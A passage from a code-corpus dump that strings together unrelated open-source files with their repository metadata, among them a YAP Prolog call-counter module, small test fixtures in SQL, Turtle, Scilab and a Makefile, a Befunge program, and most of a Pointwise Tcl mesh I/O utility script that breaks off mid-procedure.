* + _CallsMax_
*
* throw the exception `call_counter` when the
* counter `calls` reaches 0;
*
* + _RetriesMax_
*
* throw the exception `retry_counter` when the
* counter `retries` reaches 0;
*
* + _CallsAndRetriesMax_
*
* throw the exception
* `call_and_retry_counter` when the counter `calls_and_retries`
* reaches 0.
*
* YAP will ignore counters that are called with unbound arguments.
*
* Next, we show a simple example of how to use call counters:
*
* ~~~~~
*
* ?- yap_flag(call_counting,on),
* [-user].
* l :- l.
* end_of_file.
*
* yap_flag(call_counting,off).
*
* yes
*
* ?- catch(
* (call_count(10000,_,_),l),
* call_counter,format("limit_exceeded.~n",[])).
*
* limit_exceeded.
*
* yes
* ~~~~~
* Notice that we first compile the looping predicate `l/0` with
* call_counting `on`. Next, we catch/3 to handle an
* exception when `l/0` performs more than 10000 reductions.
*
*
*/
call_count(Calls, Retries, Both) :-
'$check_if_call_count_on'(Calls, CallsOn),
'$check_if_call_count_on'(Retries, RetriesOn),
'$check_if_call_count_on'(Both, BothOn),
'$call_count_set'(Calls, CallsOn, Retries, RetriesOn, Both, BothOn).
'$check_if_call_count_on'(Calls, 1) :- integer(Calls), !.
'$check_if_call_count_on'(Calls, 0) :- var(Calls), !.
'$check_if_call_count_on'(Calls, A) :-
'$do_error'(type_error(integer,Calls),call_count(A)).
%% @}
| Prolog | 5 | KuroLevin/yap-6.3 | pl/callcount.yap | [
"Artistic-1.0-Perl",
"ClArtistic"
] |
// Runme script for the SWIG "allowexcept" test case.
// exec mode -1 runs the script without echoing it to the console.
exec("swigtest.start", -1);
// TODO: add tests here
exec("swigtest.quit", -1);
| Scilab | 1 | kyletanyag/LL-Smartcard | cacreader/swig-4.0.2/Examples/test-suite/scilab/allowexcept_runme.sci | [
"BSD-3-Clause"
] |
> v
v <
~ @
>:25*3*2+`!|
^ v\!`*9*52::>::25*2+25**2+`!\v
>25*6*4+`*v *`+6*9*52 <
, !
^ _v
^ -+2*3*52<
| Befunge | 0 | SuprDewd/BefungeSimulator | befunge_code/codeforces_130/g.befunge | [
"MIT"
] |
-- Fixture data: bulk rows for table tc, columns (int, 8-hex-char
-- string, bigint). Values are opaque test data; keep them verbatim.
insert into tc values (24, '047d33e1', 6258079592828397861);
insert into tc values (23, '2243ea6f', 7088347479672485798);
insert into tc values (23, 'cea49f09', 8001462897050647577);
insert into tc values (23, 'e006730c', 7519413717684482848);
insert into tc values (22, '4f5ef461', 5346582882338619316);
insert into tc values (5, '6a439109', 1536828451068403539);
insert into tc values (23, '21ace3c9', 922347470705201988);
insert into tc values (26, '6c57945f', 48160473148417915);
insert into tc values (21, 'd6d8f6ee', 4056110477291659878);
insert into tc values (23, '20759ed6', 3751600657493053897);
insert into tc values (5, '63830654', 2617386045570170710);
insert into tc values (23, '7f5792cc', 8959454966477811865);
insert into tc values (25, 'dcae0dc0', 923824035385475923);
insert into tc values (23, '0b5cc9f9', 3377501517481580649);
insert into tc values (5, 'e88ccc95', 1799945200940483370);
insert into tc values (5, '4825909c', 4976960922359454122);
insert into tc values (23, '0f342e5f', 4839883667201182891);
insert into tc values (23, '9f7d4fe6', 1723593630324400575);
insert into tc values (23, '5bca1346', 7167167179664100530);
insert into tc values (5, '4cbf07e9', 8050395970322467361);
| SQL | 0 | cuishuang/tidb | br/tests/lightning_duplicate_detection/data/dup_detect.tc.1.sql | [
"Apache-2.0"
] |
<http://a.example/s> <http://a.example/p> _:a·̀ͯ‿.⁀ .
| Turtle | 0 | joshrose/audacity | lib-src/lv2/serd/tests/TurtleTests/labeled_blank_node_with_non_leading_extras.ttl | [
"CC-BY-3.0"
] |
# Pull in the shared run-make test helpers ($(RUSTC), $(TMPDIR), ...).
-include ../../run-make-fulldeps/tools.mk

# Binary-size regression check. It is only meaningful when targeting
# wasm32; on any other target `all` is an empty goal so the test suite
# still passes. The first `wc -c` logs the size, the bracket test then
# asserts the LTO-optimized .wasm stays under 25000 bytes.
ifeq ($(TARGET),wasm32-unknown-unknown)
all:
	$(RUSTC) foo.rs -C lto -O --target wasm32-unknown-unknown
	wc -c < $(TMPDIR)/foo.wasm
	[ "`wc -c < $(TMPDIR)/foo.wasm`" -lt "25000" ]
else
all:
endif
| Makefile | 3 | Eric-Arellano/rust | src/test/run-make/wasm-stringify-ints-small/Makefile | [
"ECL-2.0",
"Apache-2.0",
"MIT-0",
"MIT"
] |
#
# Copyright 2013 (c) Pointwise, Inc.
# All rights reserved.
#
# This sample script is not supported by Pointwise, Inc.
# It is provided freely for demonstration purposes only.
# SEE THE WARRANTY DISCLAIMER AT THE BOTTOM OF THIS FILE.
#
if { ![namespace exists pwio] } {
package require PWI_Glyph
#puts "pwio scriptdir='[file dirname [info script]]'"
namespace eval pwio {
#========================================================================
# utils namespace
#========================================================================
namespace eval utils {
proc assert { cond msg {exitVal -1} } {
    # Evaluate cond; when it is false, report the failed condition and
    # message, then terminate the script with exitVal. Passing
    # exitVal == 0 downgrades the failure to a warning and continues.
    if { [expr $cond] } {
        return
    }
    puts "assert failed: ($cond)"
    puts "message : $msg"
    if { 0 != $exitVal } {
        exit $exitVal
    }
}
proc entBaseType { ent {subTypeVarName ""} } {
    # Classify a Glyph entity from its type string, e.g.
    # "pw::DomainStructured" -> base "Domain", sub "Structured".
    # Returns the base type; the sub type is stored through the optional
    # variable name. Both come back empty when the pattern fails.
    if { "" != $subTypeVarName } {
        upvar 1 $subTypeVarName subType
    }
    # NOTE(review): "Node*" in the regexp matches "Nod" plus zero or
    # more "e" characters; presumably plain "Node" was intended --
    # confirm against the Glyph entity type names before changing.
    if { 0 == [regexp {\mpw::(Block|Domain|Connector|Node*)(Structured|Unstructured|Extruded)*} [$ent getType] -> baseType subType] } {
        set baseType ""
        set subType ""
    } elseif { "" == $subType } {
        # No sub-type suffix (e.g. plain pw::Connector): reuse the base.
        set subType $baseType
    }
    return $baseType
}
proc getBlockFaces { blk } {
set faces [list]
for {set ii 1} {$ii <= [$blk getFaceCount]} {incr ii} {
lappend faces [$blk getFace $ii]
}
return $faces
}
proc getBlockDomains { blk } {
set doms [list]
foreach face [getBlockFaces $blk] {
set doms [concat $doms [getFaceDomains $face]]
}
return $doms
}
proc getFaceDomains { face } {
set doms [list]
for {set ii 1} {$ii <= [$face getDomainCount]} {incr ii} {
lappend doms [$face getDomain $ii]
}
return $doms
}
proc getFaceEdges { face } {
set edges [list]
for {set ii 1} {$ii <= [$face getEdgeCount]} {incr ii} {
lappend edges [$face getEdge $ii]
}
return $edges
}
proc getEdgeConnectors { edge } {
set cons [list]
for {set ii 1} {$ii <= [$edge getConnectorCount]} {incr ii} {
lappend cons [$edge getConnector $ii]
}
return $cons
}
proc getFaceEdgeConnectors { face } {
set cons [list]
foreach edge [getFaceEdges $face] {
set cons [concat $cons [getEdgeConnectors $edge]]
}
return $cons
}
proc getPerimeterPointCount { ent } {
set ret 0
switch -exact [$ent getType] {
pw::Node {
set ret 0
}
pw::Connector {
set ret 2
}
pw::DomainUnstructured {
set ret [$ent getPerimeterPointCount]
}
pw::DomainStructured {
lassign [$ent getDimensions] i j
set ret [expr {($i * 2) + ($j * 2) - 4}]
}
pw::FaceUnstructured {
foreach edge [getFaceEdges $ent] {
incr ret [expr {[$edge getPointCount] - 1}]
}
}
pw::FaceStructured {
lassign [$ent getDimensions] i j
set ret [expr {($i * 2) + ($j * 2) - 4}]
}
pw::BlockExtruded {
lassign [$ent getDimensions] numBasePts one numExtrudePts
set ret [expr {($numBasePts * 2) + (($numExtrudePts - 2) * \
[getPerimeterPointCount [$ent getFace JMinimum]])}]
}
pw::BlockUnstructured {
if { [getSupportEnts $ent supEnts] } {
foreach supEnt $supEnts {
incr ret [getOwnedPointCount $supEnt]
}
}
}
pw::BlockStructured {
lassign [$ent getDimensions] i j k
set ret [expr {(($i * $j) + ($i * ($k - 2)) + (($j - 2) * ($k - 2))) * 2}]
}
default {
assert 0 "getPerimeterPointCount: Bad Entity '[$ent getType]'"
} }
return $ret
}
proc getOwnedPointCount { ent } {
set ret 0
switch -exact [$ent getType] {
pw::Node {
set ret 1
}
pw::Connector {
set ret [expr {[$ent getPointCount] - 2}]
}
pw::DomainUnstructured {
set ret [expr {[$ent getPointCount] - [$ent getPerimeterPointCount]}]
}
pw::DomainStructured {
lassign [$ent getDimensions] i j
set ret [expr {($i - 2) * ($j - 2)}]
}
pw::BlockUnstructured {
set ret [expr {[$ent getPointCount] - [getPerimeterPointCount $ent]}]
}
pw::BlockStructured {
lassign [$ent getDimensions] i j k
set ret [expr {($i - 2) * ($j - 2) * ($k - 2)}]
}
pw::BlockExtruded {
set ret [expr {[$ent getPointCount] - [getPerimeterPointCount $ent]}]
}
}
return $ret
}
proc isBndryEnt { ent allEnts } {
# getRegisterBoundaryConditions returns a list of {{register} parentEntity} lists
# { {::pw::BlockStructured_2 ::pw::DomainStructured_283 Opposite} ::pw::BoundaryCondition_46 }
# { {::pw::BlockStructured_3 ::pw::DomainStructured_283 Same} ::pw::BoundaryCondition_46 }
set regBCs [$ent getRegisterBoundaryConditions]
set numParents [llength $regBCs]
if {1 == $numParents} {
return true ;# hard bndry ents have only one parent
} elseif { $numParents > 2 } {
# non-manifold topology!
assert 0 "$ent $numParents has NONMANIFOLD CONNECTIVITY!"
}
# ent has 2 parents and is a cnxn UNLESS BC is applied
set ret false ;# assume cnxn
foreach regBC $regBCs {
lassign $regBC reg bc
lassign $reg parentEnt cnxnEnt orient
if { -1 == [lsearch -exact $allEnts $parentEnt] } {
# reg parent ent is not part of the export. ent is a bndry
set ret true
break
}
set bcName [$bc getName]
if { $bcName != "Unspecified" } {
# cnxn ent has BCs assigned it is a bndry
set ret true
#break
}
}
return $ret
}
proc getNodeDbEnt { node dbEntVarName } {
upvar 1 $dbEntVarName dbEnt
set dbEnt [lindex [$node getPoint] 2]
if { "::pw::" != [string range $dbEnt 0 5] } {
set dbEnt ""
}
return [expr {0 != [string length $dbEnt]}]
}
proc entLockInterior { ent } {
switch -exact [$ent getType] {
pw::Node -
pw::Connector -
pw::DomainUnstructured -
pw::DomainStructured -
pw::BlockUnstructured -
pw::BlockExtruded {
# do nothing
}
pw::BlockStructured {
while { [$ent getInteriorState] == "Locked" } {
$ent unlockInterior
}
$ent lockInterior
}
}
}
proc entUnlockInterior { ent {clearAllLocks 0} } {
switch -exact [$ent getType] {
pw::Node -
pw::Connector -
pw::DomainUnstructured -
pw::DomainStructured -
pw::BlockUnstructured -
pw::BlockExtruded {
# do nothing
}
pw::BlockStructured {
$ent unlockInterior
while { $clearAllLocks && [$ent getInteriorState] == "Locked" } {
$ent unlockInterior
}
}
}
}
proc entGetName { ent } {
set baseType [entBaseType $ent]
switch -exact $baseType {
Block -
Domain -
Connector {
set name [$ent getName]
}
Node {
# ::pw::Node_195
set name [string range $ent 6 end]
} }
return $name
}
proc entGetDimensions { ent } {
switch -exact [entBaseType $ent] {
Block { set dim [$ent getDimensions] }
Domain { set dim [$ent getDimensions] ; lappend dim 1 }
Connector { set dim [list [$ent getDimension] 1 1] }
Node { set dim [list 1 1 1] }
default { assert false "Invalid Ent Type ([entBaseType $ent])" }
}
return $dim ;# returns {i j k}
}
proc entIjkToIndex { ent ijk } {
set ret 0
set baseType [entBaseType $ent subType]
switch -exact $subType {
Node -
Connector -
Unstructured {
set ret [lindex $ijk 0] ;# grab the i
}
Structured -
Extruded {
if { "Domain" == $baseType } {
set ijk [lrange $ijk 0 1] ;# convert to ij
}
set ret [$ent getLinearIndex $ijk]
}
default {
assert false "bad subType '$subType'"
}
}
return $ret
}
proc ijkToIndexStructured { ijk ijkdim } {
    # Map a 1-based {i j k} triple onto a 1-based linear index in a
    # structured grid of dimensions {idim jdim kdim}. Short inputs
    # ({i} or {i j}) are padded so the same code serves 1-D and 2-D.
    lassign [concat $ijk {1 1}] i j k
    lassign [concat $ijkdim {0 0}] idim jdim kdim
    # i is already 1-based, so only the j and k terms are zero-shifted.
    return [expr {($k - 1) * $idim * $jdim + ($j - 1) * $idim + $i}]
}
proc indexToIjkStructured { ndx ijkdim } { ;# ndx must be 1-based
    # Inverse of ijkToIndexStructured: map a 1-based linear index back
    # to a 1-based {i j k} triple for a grid of dims {idim jdim kdim}.
    # An ij-only dims list is padded with kdim = 1.
    lassign [concat $ijkdim {1}] idim jdim kdim
    assert "$ndx > 0 && $ndx <= ($idim * $jdim * $kdim)" \
        "indexToIjkStructured: Invalid ndx ($ndx)"
    set n0 [expr {$ndx - 1}]            ;# work in 0-based space
    if { $kdim != 0 } {
        # Peel off whole ij-planes to get the k layer.
        set k [expr {$n0 / ($idim * $jdim)}]
        set n0 [expr {$n0 - $k * $idim * $jdim}]
    } else {
        set k 0
    }
    set j [expr {$n0 / $idim}]
    set i [expr {$n0 - $j * $idim + 1}] ;# +1 restores 1-based i
    return [list $i [expr {$j + 1}] [expr {$k + 1}]]
}
proc entIndexToIjk { ent entNdx1 } { ;# entNdx1 must be 1-based
assert "$entNdx1 >= 1 && $entNdx1 <= [$ent getPointCount]" \
"entIndexToIjk: Bad Index $entNdx1 for $ent"
set ret 0
set baseType [entBaseType $ent subType]
switch -exact $subType {
Node -
Connector -
Unstructured {
set ret [list $entNdx1 1 1]
}
Structured -
Extruded {
set ret [indexToIjkStructured $entNdx1 [$ent getDimensions]]
}
default {
assert false "bad subType '$subType'"
}
}
return $ret
}
proc makeCoord { ent ijk } { ;# 1-based ijk
return [lappend ijk $ent]
}
proc makeCoordFromIjkVals { ent i j k } { ;# 1-based i j k
return [makeCoord $ent [list $i $j $k]]
}
proc makeCoordFromEntIndex { ent ndx } { ;# 1-based ndx relative to ent's pt space
return [makeCoord $ent [entIndexToIjk $ent $ndx]]
}
proc sortEntsByType { ents } {
proc compareBaseTypes {type1 type2} {
array set rank {Block 0 Domain 1 Connector 2 Node 3}
return [expr {$rank([entBaseType $type1]) - $rank([entBaseType $type2])}]
}
# sort ents in Block/Domain/Connector/Node order
return [lsort -command compareBaseTypes $ents]
}
proc pointToString { pt } {
    # Render a point as "{x y z}" with %8.5f components, or as
    # "{u v ::pw::Entity}" when the third element names a database
    # entity (recognized by its "::pw::" prefix).
    lassign $pt xu yv zdb
    if { [string equal -length 6 "::pw::" $zdb] } {
        return [format "\{%8.5f %8.5f %s\}" $xu $yv $zdb]
    }
    return [format "\{%8.5f %8.5f %8.5f\}" $xu $yv $zdb]
}
proc xyzEqual { xyz1 xyz2 {tol 1.0e-8} } {
    # Component-wise equality of two xyz triples: true when every
    # coordinate pair differs by less than tol.
    lassign $xyz1 ax ay az
    lassign $xyz2 bx by bz
    if { abs($ax - $bx) >= $tol } { return 0 }
    if { abs($ay - $by) >= $tol } { return 0 }
    if { abs($az - $bz) >= $tol } { return 0 }
    return 1
}
proc valEqual { val1 val2 {tol 1.0e-8} } {
    # True when the two scalars differ by strictly less than tol.
    set delta [expr {abs($val1 - $val2)}]
    return [expr {$delta < $tol}]
}
proc coordToPtString { coord } {
# pt == {u v ::pw::Surface_1} or {x y z}
set pt [pw::Grid getPoint $coord]
set ret [pointToString $pt]
if { -1 != [string first "::pw::" $ret] } {
set xyz [pw::Grid getXYZ $coord]
set ret "[pointToString $xyz] @ $ret"
}
return $ret
}
proc vcToString { vc } {
set vcName [$vc getName]
if {$vcName == "Unspecified" } {
return $vcName
}
return "$vcName [$vc getId] [$vc getPhysicalType]"
}
proc labelPt { ndx pt } {
lassign $pt x y z
set noteHt 0.04
set note [pw::Note create]
$note setText "$ndx"
$note setPosition [list $x $y $z]
$note setSize $noteHt
$note setColor 0x0000FF00
$note setRenderAttribute ColorMode Entity
}
proc printEntInfo { title ents {dim 0} {allEnts {}} } {
proc compareBaseTypes {type1 type2} {
array set rank {Block 0 Domain 1 Connector 2 Node 3}
return [expr {$rank([entBaseType $type1]) - $rank([entBaseType $type2])}]
}
# sort ents in Block/Domain/Connector/Node order
set ents [lsort -command compareBaseTypes $ents]
set fmt "| %-30.30s | %-20.20s | %10.10s | %6.6s | %-13.13s | %-10.10s | %-5.5s |"
puts "$title"
puts [format $fmt "Entity" "Name" "NumPts" "DbPts" "Dim" "BaseType" "BorC"]
set tmp [string repeat "-" 50]
puts [format $fmt $tmp $tmp $tmp $tmp $tmp $tmp $tmp]
foreach ent $ents {
array set eInfo [list Name "[entGetName $ent]" NumPts "" DbPts "" Dim "" Bndry ""]
set baseType [entBaseType $ent]
switch -exact $baseType {
Block -
Domain {
#set eInfo(Name) [$ent getName]
set eInfo(NumPts) [$ent getPointCount -constrained eInfo(DbPts)]
set eInfo(Dim) [$ent getDimensions]
if { $baseType == "Domain" && $dim == 3 } {
if { [isBndryEnt $ent $allEnts] } {
set eInfo(Bndry) "Bndry"
} else {
set eInfo(Bndry) "Cnxn"
}
}
}
Connector {
#set eInfo(Name) [$ent getName]
set eInfo(NumPts) [$ent getPointCount -constrained eInfo(DbPts)]
set eInfo(Dim) [$ent getDimension]
if { $dim == 2 } {
if { [isBndryEnt $ent $allEnts] } {
set eInfo(Bndry) "Bndry"
} else {
set eInfo(Bndry) "Cnxn"
}
}
}
Node {
#set eInfo(Name) ""
set eInfo(NumPts) 1
set eInfo(DbPts) [getNodeDbEnt $ent ignore]
set eInfo(Dim) 1
} }
if { $eInfo(DbPts) == 0 } {
set eInfo(DbPts) ""
}
puts [format $fmt $ent $eInfo(Name) $eInfo(NumPts) $eInfo(DbPts) $eInfo(Dim) $baseType $eInfo(Bndry)]
}
}
proc getSelection { selType selectedVarName errMsgVarName } {
upvar 1 $selectedVarName selected
upvar 1 $errMsgVarName errMsg
array set validSelTypes { \
Connector 0 \
Domain 1 \
Block 2 \
Database 3 \
Spacing 4 \
Boundary 5 \
}
array set typeFilters { \
Connector {Dimensioned} \
Domain {Defined} \
Block {Defined} \
Database {Models Quilts} \
Spacing {Begin End} \
DatabaseBoundary {} \
}
set ret 0
set selected {}
set allEnts [pw::Grid getAll -type "pw::$selType"]
set gridCnt 0
foreach ent $allEnts {
if { [$ent getEnabled] && [pw::Display isLayerVisible [$ent getLayer]] } {
incr gridCnt
lappend selected $ent
}
}
if { "" == [array get validSelTypes $selType] } {
set errMsg "Invalid Selection Type '$selType'"
} elseif { 0 == $gridCnt } {
set errMsg "No appropriate $selType entities are available for selection!"
} elseif { 1 == $gridCnt } {
# force selection of only $selType ent available
set ret 1
} else {
set filter $typeFilters($selType)
# set selection based on current 2D/3D setting
set mask [pw::Display createSelectionMask -require$selType $filter]
if { [pw::Display selectEntities \
-description "Select $selType\s" \
-selectionmask $mask \
picks] } {
set selected $picks($selType\s)
set ret 1
} else {
set errMsg "$selType selection aborted!"
}
}
return $ret
}
# returns true/false
# support ents placed in supEntsVarName
# if addEnts is true, ents will also be added to supEntsVarName
proc getSupportEnts { ents supEntsVarName {addEnts false}} {
upvar 1 $supEntsVarName supEnts
set supEnts [list]
array set unique {} ;# empty array - used to track unique ent names
foreach ent $ents {
if { "" == [set base [entBaseType $ent]] } {
continue ; # BAD!
}
set funcName "getSupportEnts_Private::push$base\AndSupportEnts"
$funcName $ent unique $addEnts
}
# extract the list of unique entity names
set supEnts [array names unique]
return [expr {0 != [llength $supEnts]}]
}
namespace eval getSupportEnts_Private {
proc pushBlockAndSupportEnts { blk uniqueVarName {addBlk true}} {
upvar 1 $uniqueVarName unique
if { "" == [array names unique -exact $blk] } {
if { $addBlk } {
set unique($blk) 1 ;# add to array
}
set faceCnt [$blk getFaceCount]
for {set ii 1} {$ii <= $faceCnt} {incr ii} {
set face [$blk getFace $ii]
set domCnt [$face getDomainCount]
for {set jj 1} {$jj <= $domCnt} {incr jj} {
pushDomainAndSupportEnts [$face getDomain $jj] unique
}
}
}
}
proc pushDomainAndSupportEnts { dom uniqueVarName {addDom true}} {
upvar 1 $uniqueVarName unique
if { "" == [array names unique -exact $dom] } {
if { $addDom } {
set unique($dom) 1 ;# add to array
}
set edgeCnt [$dom getEdgeCount]
for {set ii 1} {$ii <= $edgeCnt} {incr ii} {
set edge [$dom getEdge $ii]
set conCnt [$edge getConnectorCount]
for {set jj 1} {$jj <= $conCnt} {incr jj} {
pushConnectorAndSupportEnts [$edge getConnector $jj] unique
}
}
}
}
proc pushConnectorAndSupportEnts { con uniqueVarName } {
upvar 1 $uniqueVarName unique
# if con is not in array, process it
if { "" == [array names unique -exact $con] } {
set unique($con) 1 ;# add to array
pushNodeAndSupportEnts [$con getNode Begin] unique
pushNodeAndSupportEnts [$con getNode End] unique
}
}
proc pushNodeAndSupportEnts { node uniqueVarName } {
upvar 1 $uniqueVarName unique
# if node is not in array, process it
if { "" == [array names unique -exact $node] } {
set unique($node) 1 ;# add to array
# nodes do NOT have support ents - all done!
}
}
} ;# namespace eval getSupportEnts_Private
}
#========================================================================
# cell namespace
#========================================================================
namespace eval cell {
# key = "dim,numCellPts"
# val = "edge1p1 edge1p2 edge2p1 edge2p2 ... edgeNp1 edgeNp2"
variable edgeMap ; array set edgeMap {
"2e3" { 0 1 1 2 2 0 } ;# tri
"2e4" { 0 1 1 2 2 3 3 0 } ;# quad
"3e4" { 0 1 1 2 2 0 0 3 1 3 2 3 } ;# tet
"3e5" { 0 1 1 2 2 3 3 0 0 4 1 4 2 4 3 4 } ;# pyramid
"3e6" { 0 1 1 2 2 0 3 4 4 5 5 3 0 3 1 4 2 5 } ;# prism
"3e8" { 0 1 1 2 2 3 3 0 4 5 5 6 6 7 7 4 0 4 1 5 2 6 3 7 } ;# hex
}
# key = "dim,numCellPts"
# val = "{face1} {face2} ... {faceN}"
variable faceMap ; array set faceMap {
"2f3" { {0 1} {1 2} {2 0} } ;# tri
"2f4" { {0 1} {1 2} {2 3} {3 0} } ;# quad
"3f4" { {0 1 2} {0 3 1} {1 3 2} {2 3 0} } ;# tet
"3f5" { {0 1 2 3} {0 4 1} {1 4 2} {2 4 3} {3 4 0} } ;# pyramid
"3f6" { {0 1 2} {3 5 4} {0 3 4 1} {1 4 5 2} {2 5 3 0} } ;# prism
"3f8" { {0 1 2 3} {4 7 6 5} {0 4 5 1} {1 5 6 2} {2 6 7 3} {3 7 4 0} } ;# hex
}
proc getEdges { cell {minFirstOrder 0} {revVarName ""} } {
if { "" != $revVarName } {
upvar 1 $revVarName rev
}
set key "$pwio::caeDim\e[llength $cell]"
variable edgeMap
pwio::utils::assert "\"\" != \"[array names edgeMap $key]\"" "Invalid cell edgeMap key: '$key'"
set ret [list]
set rev [list]
set map $edgeMap($key)
foreach {i1 i2} $map {
set v1 [lindex $cell $i1]
set v2 [lindex $cell $i2]
if { $minFirstOrder && ($v2 < $v1) } {
lappend ret [list $v2 $v1]
lappend rev 1
} else {
lappend ret [list $v1 $v2]
lappend rev 0
}
}
return $ret
}
proc getFaceEdges { face {minFirstOrder 0} {revVarName ""} } {
if { "" != $revVarName } {
upvar 1 $revVarName rev
}
set key "2\e[llength $face]"
variable edgeMap
pwio::utils::assert "\"\" != \"[array names edgeMap $key]\"" "Invalid cell edgeMap key: '$key'"
set ret [list]
set rev [list]
set map $edgeMap($key)
foreach {i1 i2} $map {
set v1 [lindex $face $i1]
set v2 [lindex $face $i2]
if { $minFirstOrder && ($v2 < $v1) } {
lappend ret [list $v2 $v1]
lappend rev 1
} else {
lappend ret [list $v1 $v2]
lappend rev 0
}
}
return $ret
}
proc getFaces { cell {minFirstOrder 0} } {
variable faceMap
set f f
set key "$pwio::caeDim$f[llength $cell]"
pwio::utils::assert "\"\" != \"[array names faceMap $key]\"" "Invalid cell faceMap key: '$key'"
set ret [list]
set map $faceMap($key)
foreach faceIndices $map { ;# faceIndices is a list of cell local indices
set face [list]
foreach ndx $faceIndices {
lappend face [lindex $cell $ndx]
}
if {$minFirstOrder} {
set minIdx 0
set minVal [lindex $face $minIdx]
for {set j 1} {$j < [llength $face]} {incr j} {
if {[set val [lindex $face $j]] < $minVal} {
set minVal $val
set minIdx $j
}
}
if {$minIdx > 0} {
set minFirstFace [concat [lrange $face $minIdx end] \
[lrange $face 0 [expr {$minIdx - 1}]]]
} else {
set minFirstFace $face
}
lappend ret $minFirstFace
} else {
lappend ret $face
}
}
return $ret
}
}
#========================================================================
# pwio variables
#========================================================================
# misc variables
variable selEnts [list]
variable caeDim [pw::Application getCAESolverDimension]
variable perimPtCountCache ;# maps an ent to its num of perim points
array set perimPtCountCache {}
# coords db variables
variable coordSingleEnt ""
variable entToCoordTotalsOffset ; array set entToCoordTotalsOffset {} ;# maps an ent to its offset into coordTotals list
variable coordTotals [list] ;# list of {entOwnedPts totalOwnedPts ent} lists
variable totalOwnedPts 0
variable ndxCoordTotals 0 ;# cached index into coordTotals list
variable offsetGlobToLocalGetCoord 0 ;# cached global to owned index offset: globNdx = ownedNdx + offsetGlobToLocalGetCoord
variable prevCoordEntName "@null" ;# cached name of previous coord entity enumerated
variable offsetGlobToLocalGetCoordIndex 0 ;# cached global to owned index offset: globNdx = ownedNdx + offsetGlobToLocalGetCoordIndex
# cells db variables
variable cellSingleEnt ""
variable totalCellCount 0
variable cellTotals [list] ;# list of {entCellCount totalEntCellCount ent} lists
variable entToCellTotalsOffset ;# maps an ent to its offset into cellTotals list
array set entToCellTotalsOffset {}
variable ndxCellTotals 0 ;# cached index into cellTotals list
variable offsetGlobToLocalGetCell 0 ;# cached global to cell index offset: globCellNdx = entCellNdx + offsetGlobToLocalGetCell
variable prevCellEntName "@null" ;# cached name of previous cell entity enumerated
variable offsetGlobToLocalGetCellIndex 0 ;# cached global to cell index offset: globNdx = cellNdx + offsetGlobToLocalGetCellIndex
#public
#========================================================================
namespace export beginIO
proc beginIO { ents } {
    # Prepare the pwio point/cell enumeration for the given entities:
    # reset cached state, rebuild the index tables, and lock each
    # entity's interior point data for fast repeated access.
    # Pair every beginIO with a matching endIO.
    variable selEnts
    reset
    set selEnts $ents
    build
    foreach ent $selEnts {
        utils::entLockInterior $ent
    }
}
#========================================================================
namespace export endIO
proc endIO { {clearAllLocks 0} } {
    # Release the interior-data locks taken by beginIO. With
    # clearAllLocks true, structured blocks drop every outstanding
    # lock, not just the one beginIO added.
    variable selEnts
    foreach ent $selEnts {
        utils::entUnlockInterior $ent $clearAllLocks
    }
}
#========================================================================
namespace export getCoordCount
proc getCoordCount {} {
    # Total number of owned grid points (each shared point counted once
    # by its owning entity) across the entities registered by beginIO.
    variable totalOwnedPts
    return $totalOwnedPts
}
#========================================================================
namespace export getCoord
proc getCoord { enumNdx } { ;# 1-based index
variable coordSingleEnt
variable entToCoordTotalsOffset
variable coordTotals
variable totalOwnedPts
variable ndxCoordTotals
variable offsetGlobToLocalGetCoord
utils::assert "$enumNdx >=1 && $enumNdx <= $totalOwnedPts" \
"Invalid global index in pwio::getCoord($enumNdx)"
set ret {} ;# GgGridCoord
if { "" != $coordSingleEnt } {
return [utils::makeCoordFromEntIndex $coordSingleEnt $enumNdx]
}
incr enumNdx -1 ;# convert to 0-based index
# indexes will typically be looped over from 0 to NumPts, so we cache
# the ndxCoordTotals index into the coordTotals list and offsetGlobToLocalGetCoord
if { $enumNdx == [lindex $coordTotals $ndxCoordTotals 1] } {
# moving to the next position in the coordTotals array
set offsetGlobToLocalGetCoord [lindex $coordTotals $ndxCoordTotals 1]
incr ndxCoordTotals
} elseif { $enumNdx < $offsetGlobToLocalGetCoord || $enumNdx >= [lindex $coordTotals $ndxCoordTotals 1] } {
# not in the cached range, so do a binary search to find the correct range
set lo 0
set hi [llength $coordTotals]
while { $lo < $hi } {
set mid [expr {($lo + $hi) / 2}]
if { [lindex $coordTotals $mid 1] <= $enumNdx } {
set lo [incr mid];
} else {
set hi $mid
}
}
set ndxCoordTotals $lo
if { $ndxCoordTotals == 0 } {
set offsetGlobToLocalGetCoord 0
} else {
set offsetGlobToLocalGetCoord [lindex $coordTotals [incr lo -1] 1]
}
}
incr enumNdx ;# convert back to 1-based index
set ent [lindex $coordTotals $ndxCoordTotals 2]
set ownedNdx [expr {$enumNdx - $offsetGlobToLocalGetCoord}]
set entIjk [entOwnedIndexToIjk $ent $ownedNdx]
return [utils::makeCoord $ent $entIjk]
}
#========================================================================
namespace export getCoordIndex
proc getCoordIndex { coord {mapCoordToOwner 1} } {
variable coordSingleEnt
variable entToCoordTotalsOffset
variable coordTotals
variable prevCoordEntName
variable offsetGlobToLocalGetCoordIndex
if { "" != $coordSingleEnt } {
if { $coordSingleEnt == [coordGetEntity $coord] } {
return [utils::entIjkToIndex $coordSingleEnt [coordGetIjk $coord]]
} elseif { [coordMapToEntity $coord $coordSingleEnt coords] > 0 } {
return [utils::entIjkToIndex $coordSingleEnt [coordGetIjk [lindex $coords 0]]]
} else {
utils::assert false "pwio::getCoordIndex: Could not map coord ($coord) to coordSingleEnt"
}
}
if { $mapCoordToOwner } {
set ownerCoord [mapToOwner $coord]
set ent [coordGetEntity $ownerCoord]
set ijk [coordGetIjk $ownerCoord]
} else {
set ent [coordGetEntity $coord]
set ijk [coordGetIjk $coord]
}
if { $ent != $prevCoordEntName } {
set match [array get entToCoordTotalsOffset $ent]
if { 2 != [llength $match] } {
utils::assert false "pwio::getCoordIndex: Entity not found ($ent) '$match'"
}
# match is {ent offset} list
lassign $match -> totalsOffset
set prevCoordEntName $ent
set offsetGlobToLocalGetCoordIndex [lindex $coordTotals [expr {$totalsOffset - 1}] 1]
}
set ret [entIjkToOwnedIndex $ent $ijk]
if { $offsetGlobToLocalGetCoordIndex > 0 } {
# owned indices after the first range must be offset to the enum's
# index space
incr ret $offsetGlobToLocalGetCoordIndex
}
return $ret
}
#========================================================================
namespace export getCellCount
proc getCellCount {} {
    # Total number of cells across the entities registered by beginIO.
    variable totalCellCount
    return $totalCellCount
}
#========================================================================
namespace export getCell
proc getCell { enumNdx {vcVarName ""} } { ;# 1-based index
if { "" != $vcVarName } {
upvar 1 $vcVarName vc
}
variable cellSingleEnt
variable entToCellTotalsOffset
variable cellTotals
variable totalCellCount
